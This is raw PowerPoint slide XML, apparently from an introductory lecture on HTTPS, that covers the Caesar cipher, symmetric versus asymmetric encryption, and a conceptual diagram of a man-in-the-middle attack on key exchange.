            <a:off x="10509428" y="3454916"/>
            <a:ext cx="391297" cy="407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Z</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10946032" y="3454916"/>
            <a:ext cx="391297" cy="40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A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="60" name="Straight Arrow Connector 59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="2"/>
            <a:endCxn id="32" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663138" y="2098460"/>
            <a:ext cx="0" cy="1356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5" idx="2"/>
            <a:endCxn id="33" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099744"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7" idx="2"/>
            <a:endCxn id="35" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1972956"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a:stCxn id="6" idx="2"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1536350"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8" idx="2"/>
            <a:endCxn id="36" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409562"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9" idx="2"/>
            <a:endCxn id="37" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2846168"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10" idx="2"/>
            <a:endCxn id="38" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3282774"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11" idx="2"/>
            <a:endCxn id="39" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719380"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12" idx="2"/>
            <a:endCxn id="40" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4155986"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13" idx="2"/>
            <a:endCxn id="41" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4592592"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14" idx="2"/>
            <a:endCxn id="42" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029198"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a:stCxn id="16" idx="2"/>
            <a:endCxn id="44" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5902410"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15" idx="2"/>
            <a:endCxn id="43" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5465804"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17" idx="2"/>
            <a:endCxn id="45" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6339016"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a:stCxn id="18" idx="2"/>
            <a:endCxn id="46" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6775622"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a:stCxn id="21" idx="2"/>
            <a:endCxn id="49" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8085440"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20" idx="2"/>
            <a:endCxn id="48" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7648834"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a:stCxn id="19" idx="2"/>
            <a:endCxn id="47" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7212228"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a:stCxn id="29" idx="2"/>
            <a:endCxn id="31" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11578287" y="2098459"/>
            <a:ext cx="2"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28" idx="2"/>
            <a:endCxn id="56" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11141681" y="2098461"/>
            <a:ext cx="1" cy="1356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27" idx="2"/>
            <a:endCxn id="55" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10705076" y="2098461"/>
            <a:ext cx="1" cy="1356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26" idx="2"/>
            <a:endCxn id="54" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10268470"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25" idx="2"/>
            <a:endCxn id="53" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9831864"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24" idx="2"/>
            <a:endCxn id="52" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9395258"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23" idx="2"/>
            <a:endCxn id="51" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8958652"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22" idx="2"/>
            <a:endCxn id="50" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8522046" y="2098461"/>
            <a:ext cx="0" cy="1356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2" name="Cloud 171"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7212228" y="334231"/>
            <a:ext cx="3281312" cy="1201897"/>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Caesar cipher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Key = 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="858786" y="4100473"/>
            <a:ext cx="11006112" cy="2185727"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Example of a symmetric-key encryption algorithm.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Same key used for both encrypting and decrypting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Suitable encryption algorithm for HTTPS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>NO! How can the client and the server safely agree on which key to use?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Asymmetric-key encryption algorithms to the rescue!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366524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308919" y="2298357"/>
            <a:ext cx="5013752" cy="312625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b"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rounded Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6903312" y="2298357"/>
            <a:ext cx="5033831" cy="31262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r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Cloud 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4839470" y="2741416"/>
            <a:ext cx="2619633" cy="1606378"/>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noProof="0" dirty="0"/>
              <a:t>Asymmetric encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="5933303" cy="480131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Encryption Key ≠ Decryption Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7142205" y="1720108"/>
            <a:ext cx="4211595"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(AKA Public Key Encryption)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2815795" y="3112172"/>
            <a:ext cx="1618735" cy="76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Encrypt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7757471" y="3106527"/>
            <a:ext cx="1618735" cy="768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Decrypt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665204" y="3117817"/>
            <a:ext cx="1336592"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Original Message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5324737" y="3117817"/>
            <a:ext cx="1578576"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Encrypted Message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2770486" y="4443380"/>
            <a:ext cx="1709351"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Encryption Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9882311" y="3117817"/>
            <a:ext cx="1471489"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Original Message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7712162" y="4443380"/>
            <a:ext cx="1709351" cy="7571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Decryption Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="3"/>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2001796" y="3496382"/>
            <a:ext cx="8139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9" idx="0"/>
            <a:endCxn id="5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3625162" y="3880592"/>
            <a:ext cx="1" cy="562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5" idx="3"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4434530" y="3496382"/>
            <a:ext cx="8902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3"/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6903313" y="3490737"/>
            <a:ext cx="854158" cy="5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1" idx="0"/>
            <a:endCxn id="6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8566838" y="3874947"/>
            <a:ext cx="1" cy="568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6" idx="3"/>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9376206" y="3490737"/>
            <a:ext cx="506105" cy="56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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="5424616"/>
            <a:ext cx="10515601" cy="121776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do clients obtain the Encryption Key?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simply ask the server for it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No! We can't trust the network...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9509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 grpId="0" build="p"/>
      <p:bldP spid="5" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="0" animBg="1"/>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Man-in-the-middle attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="1512209"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>You think you communicate with the server...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>                          ...but you actually communicate with someone else.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>You think:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147117" y="3441917"/>
            <a:ext cx="1405584" cy="29465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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rounded Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9737125" y="3441917"/>
            <a:ext cx="1405584" cy="29465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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3901130" y="3441917"/>
            <a:ext cx="4487564"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HTTP: Give me encryption key.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3777563" y="4265517"/>
            <a:ext cx="473469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HTTP: Here's the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encryption key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3777563" y="5116965"/>
            <a:ext cx="4734699"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solidFill>
              </a:rPr>
              <a:t>HTTPS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secret request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Arrow Connector 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2552701" y="3871582"/>
            <a:ext cx="7184424" cy="11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552701" y="5615414"/>
            <a:ext cx="7184424" cy="11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2552701" y="4185244"/>
            <a:ext cx="7184424" cy="16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544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p:bldP spid="29"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Man-in-the-middle attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="1512209"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>You think you communicate with the server...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>                          ...but you actually communicate with someone else.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>What actually happened:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147117" y="3441917"/>
            <a:ext cx="1405584" cy="294652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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rounded Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9737125" y="3441917"/>
            <a:ext cx="1405584" cy="29465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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rounded Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5332712" y="3441917"/>
            <a:ext cx="1526576" cy="29465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Man</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>in the middle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2617572" y="3518294"/>
            <a:ext cx="2650268" cy="2862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 Give me encryption key.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2552701" y="3878802"/>
            <a:ext cx="2780011" cy="45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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6924159" y="3518294"/>
            <a:ext cx="2650268" cy="28517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 Give me encryption key.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6859288" y="3883360"/>
            <a:ext cx="28778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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6924159" y="4220601"/>
            <a:ext cx="2820945" cy="2862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 Here's the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encryption key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Arrow Connector 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6859288" y="4185244"/>
            <a:ext cx="2877838" cy="19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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2544722" y="4304143"/>
            <a:ext cx="2820945" cy="2862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 Here's the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encryption key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Straight Arrow Connector 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2563001" y="4249339"/>
            <a:ext cx="2769710" cy="29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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2865997" y="5284567"/>
            <a:ext cx="2178394" cy="2862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HTTPS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secret request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2552701" y="5622634"/>
            <a:ext cx="2780010" cy="45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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7176574" y="5284567"/>
            <a:ext cx="2178394" cy="2862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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTPS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secret request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6863278" y="5627192"/>
            <a:ext cx="28738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8663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20" grpId="0"/>
